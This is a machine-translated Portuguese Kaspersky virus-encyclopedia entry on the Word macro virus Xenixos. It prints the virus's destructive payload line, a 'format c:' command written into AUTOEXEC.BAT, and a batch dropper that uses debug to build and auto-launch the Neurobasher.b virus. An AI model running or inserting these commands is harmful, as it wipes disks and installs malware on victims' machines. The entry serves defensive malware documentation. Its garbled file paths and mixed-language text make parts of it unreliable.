ESTE SERVIÇO PODE CONTER TRADUÇÕES FEITAS PELO GOOGLE. O GOOGLE SE ISENTA DE TODAS AS GARANTIAS RELACIONADAS ÀS TRADUÇÕES, EXPRESSAS OU IMPLÍCITAS, INCLUINDO QUALQUER RESPONSABILIDADE EM RELAÇÃO À PRECISÃO, CONFIABILIDADE E QUALQUER DEVER IMPLÍCITO SOBRE SUA COMERCIALIZAÇÃO, ADEQUAÇÃO PARA UM FIM ESPECÍFICO E NÃO-VIOLAÇÃO.

Para sua conveniência, o site da Kaspersky Lab foi traduzido com a utilização do software de tradução Google Tradutor. Foram realizados esforços razoáveis para o oferecimento de uma tradução precisa; entretanto, as traduções automatizadas não são perfeitas e tampouco pretendem substituir a tradução qualificada de especialistas. Essas traduções são fornecidas como um serviço para os usuários do site da Kaspersky Lab e são exibidas "como estão". Não há nenhuma garantia de qualquer tipo, seja expressa ou implícita, sobre a precisão, confiabilidade, ou exatidão de quaisquer traduções feitas do inglês para qualquer outro idioma. Alguns conteúdos (como imagens, vídeos, Flash, etc.) podem não estar corretamente traduzidos devido às limitações do programa de tradução.

Virus.MSWord.Xenixos

Classe Virus
Plataforma MSWord
Descrição

Detalhes técnicos

É um vírus criptografado. Contém as macros:


Drop, Dummy, AutoExec, AutoOpen, Datei�ffnen, ExtrasMakro, DateiBeenden,
DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard.
Em alguns casos, ele define a senha "xenixos" para documentos infectados, exibe a mensagem:

Esta opção não está incluída no seguinte nicht verf�gbar.
Fehler
Enquanto imprime os documentos anexados:

Trazido a você pela Corporação Nemesis, L1996
No dia 1 de maio, o vírus grava a string no arquivo AUTOEXEC.BAT:

@echo j | format c: / u> nul
Este vírus também lança o vírus multipartido "Neurobasher.b". Para fazer isso, o vírus cria o arquivo C: DOSSCRIPT.SCR e grava o despejo hexadecimal desse vírus nele. Em seguida, o vírus cria o arquivo C: DOSEXEC.BAT e grava as seqüências de caracteres para lá:

@echo off
debug <script.scr> nul
rem debugger.com
echo @ c: dosdebugger.exe >> c: autoexec.bat
del c: dosscript.scr
del c: dosexec.bat
Então o vírus executa esse arquivo. Como o resultado DEBUG.EXE cria o arquivo DEBUGGER.EXE e C: AUTOEXEC.BAT tem nova seqüência de caracteres no final:

@c: dosdebugger.exe
Assim, o último comando do Autoexec.bat lança o conta-gotas do vírus "Neurobasher.b".


Link para o original